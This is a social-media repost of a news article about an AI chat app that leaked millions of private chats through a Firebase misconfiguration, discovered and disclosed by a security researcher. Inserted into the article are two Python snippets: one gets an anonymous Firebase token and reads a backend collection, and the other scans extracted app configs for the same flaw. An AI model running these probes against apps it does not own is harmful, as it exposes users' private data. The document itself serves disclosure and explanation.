»Massive AI Chat App Leaked Millions of Users' Private Conversations:
Chat & Ask AI, which claims 50 million users, exposed private chats about suicide and making meth.«
On the one hand, I don't understand the people who use it; on the other hand, this is a company that doesn't care about people, because its users are the product.
404media.co/massive-ai-chat-ap…
#AIchat #ai #noai #leaks #suicide #meth #app #leaked #privacycheck #users #ProductPeople
Massive AI Chat App Leaked Millions of Users' Private Conversations
Chat & Ask AI, one of the most popular AI apps on the Google Play and Apple App stores, which claims more than 50 million users, left hundreds of millions of those users' private messages with the app's chatbot exposed, according to an independent security researcher and emails viewed by 404 Media. The exposed chats showed users asked the app "How do I painlessly kill myself," to write suicide notes, "how to make meth," and how to hack various apps.

The exposed data was discovered by an independent security researcher who goes by Harry. The issue is a misconfiguration in the app's use of the mobile app development platform Google Firebase, which by default makes it easy for anyone to make themselves an "authenticated" user who can access the app's backend storage, where in many instances user data is stored. Harry said that he had access to 300 million messages from more than 25 million users in the exposed database, and that he extracted and analyzed a sample of 60,000 users and a million messages. The database contained user files with a complete history of their chats with the AI, timestamps of those chats, the name they gave the app's chatbot, how they configured the model, and which specific model they used.

Chat & Ask AI is a "wrapper" that plugs into various large language models from bigger companies that users can choose from, including OpenAI's ChatGPT, Anthropic's Claude, and Google's Gemini.
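To make the class of misconfiguration concrete: a Firebase backend is exposed when its security rules treat any signed-in session as trusted (for example, a Firestore rule like `allow read: if request.auth != null;`) while anonymous sign-in is left enabled. The sketch below shows roughly how a researcher could verify this against a project; the API key, project ID, and "chats" collection name are hypothetical placeholders, not Chat & Ask AI's actual values, though the two REST endpoints are standard Firebase ones.

```python
import requests

# Hypothetical values for illustration only; in real scans these are
# extracted from the app package itself (Firebase ships them client-side).
API_KEY = "AIzaSy-EXAMPLE-KEY"
PROJECT_ID = "example-chat-backend"

# Step 1: Firebase's Identity Toolkit REST API hands an anonymous
# "authenticated" session to anyone who asks, if anonymous sign-in
# is enabled for the project.
auth = requests.post(
    f"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key={API_KEY}",
    json={"returnSecureToken": True},
    timeout=10,
)
auth.raise_for_status()
id_token = auth.json()["idToken"]

# Step 2: A rule like `allow read: if request.auth != null;` now treats
# this throwaway session as a legitimate user, so backend documents
# (here a hypothetical "chats" collection) can be listed directly.
docs = requests.get(
    f"https://firestore.googleapis.com/v1/projects/{PROJECT_ID}"
    "/databases/(default)/documents/chats",
    headers={"Authorization": f"Bearer {id_token}"},
    timeout=10,
)
print(docs.status_code)  # 200 with document data means the project is exposed
```

The underlying design choice matters here: Firebase API keys are identifiers, not secrets, so the security rules are the only real access control, and a rule that merely checks for `request.auth != null` is satisfied by any anonymous session.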
While the exposed data is a reminder of the kind of data users are potentially revealing about themselves when they talk to LLMs, the sample data itself also reveals some of the darker interactions users have with AI.
"Give me a 2 page essay on how to make meth in a world where it was legalized for medical use," one user wrote.
"I want to kill myself what is the best way," another user wrote.
Recent reporting has also shown that messages with AI chatbots are not always idle chatter. We've seen one case where a chatbot encouraged a teenager not to seek help for his suicidal thoughts. Chatbots have been linked to multiple suicides, and studies have revealed that chatbots will often answer "high risk" questions about suicide.
Chat & Ask AI is made by Turkish developer Codeway. It has more than 10 million downloads on the Google Play store and 318,000 ratings on the Apple App store. On LinkedIn, the company claims it has more than 300 employees who work in Istanbul and Barcelona.
"We take your data protection seriously – with SSL certification, GDPR compliance, and ISO standards, we deliver enterprise-grade security trusted by global organizations," Chat & Ask AI's site says.
Harry disclosed the vulnerability to Codeway on January 20. The misconfiguration exposed data not just from Chat & Ask AI users but also from users of other popular apps developed by Codeway. The company fixed the issue across all of its apps within hours, according to Harry.
The Google Firebase misconfiguration issue that exposed Chat & Ask AI user data has been known and discussed by security researchers for years, and it is still common today. Harry says his research isn't novel, but that it quantifies the problem. He created a tool that automatically scans the Google Play and Apple App stores for this vulnerability and found that 103 of the 200 iOS apps he scanned had the issue, cumulatively exposing tens of millions of stored files.
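A scanner along the lines Harry describes could, in principle, automate the probe shown earlier across many apps: pull the Firebase API key and project ID out of each app package and retry the anonymous-auth check. Below is a rough sketch under those assumptions; the `check_firebase_exposure` helper and the guessed collection names are illustrative, not Harry's actual tool, while the `google-services.json` fields are the standard ones Firebase embeds in Android builds.

```python
import json
import requests

def check_firebase_exposure(api_key: str, project_id: str) -> bool:
    """Sketch: True if the project issues anonymous tokens AND that
    token can list at least one commonly named Firestore collection."""
    try:
        auth = requests.post(
            "https://identitytoolkit.googleapis.com/v1/accounts:signUp"
            f"?key={api_key}",
            json={"returnSecureToken": True},
            timeout=10,
        )
        if auth.status_code != 200:
            return False  # anonymous sign-in disabled: this path is closed
        token = auth.json()["idToken"]
        for collection in ("users", "chats", "messages"):  # guessed names
            r = requests.get(
                f"https://firestore.googleapis.com/v1/projects/{project_id}"
                f"/databases/(default)/documents/{collection}",
                headers={"Authorization": f"Bearer {token}"},
                timeout=10,
            )
            if r.status_code == 200 and r.json().get("documents"):
                return True
    except requests.RequestException:
        pass
    return False

# Firebase config ships inside the app itself, e.g. the bundled
# google-services.json in an unpacked Android build.
with open("google-services.json") as f:  # hypothetical extracted file
    cfg = json.load(f)
api_key = cfg["client"][0]["api_key"][0]["current_key"]
project_id = cfg["project_info"]["project_id"]
print(check_firebase_exposure(api_key, project_id))
```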
Dan Guido, CEO of the cybersecurity research and consulting firm Trail of Bits, told me in an email that this Firebase misconfiguration issue is βa well known weaknessβ and easy to find. He recently noted on X that Trail of Bits was able to make a tool with Claude to scan for this vulnerability in just 30 minutes.
Harry also created a site where users can see the apps he found that suffer from this issue. If a developer reaches out to Harry and fixes the issue, Harry says he removes them from the site, which is why Codewayβs apps are no longer listed there.
Codeway did not respond to a request for comment.
ChatGPT Encouraged Suicidal Teen Not To Seek Help, Lawsuit Claims
As reported by the New York Times, a new complaint from the parents of a teen who died by suicide outlines the conversations he had with the chatbot in the months leading up to his death. (Samantha Cole, 404 Media)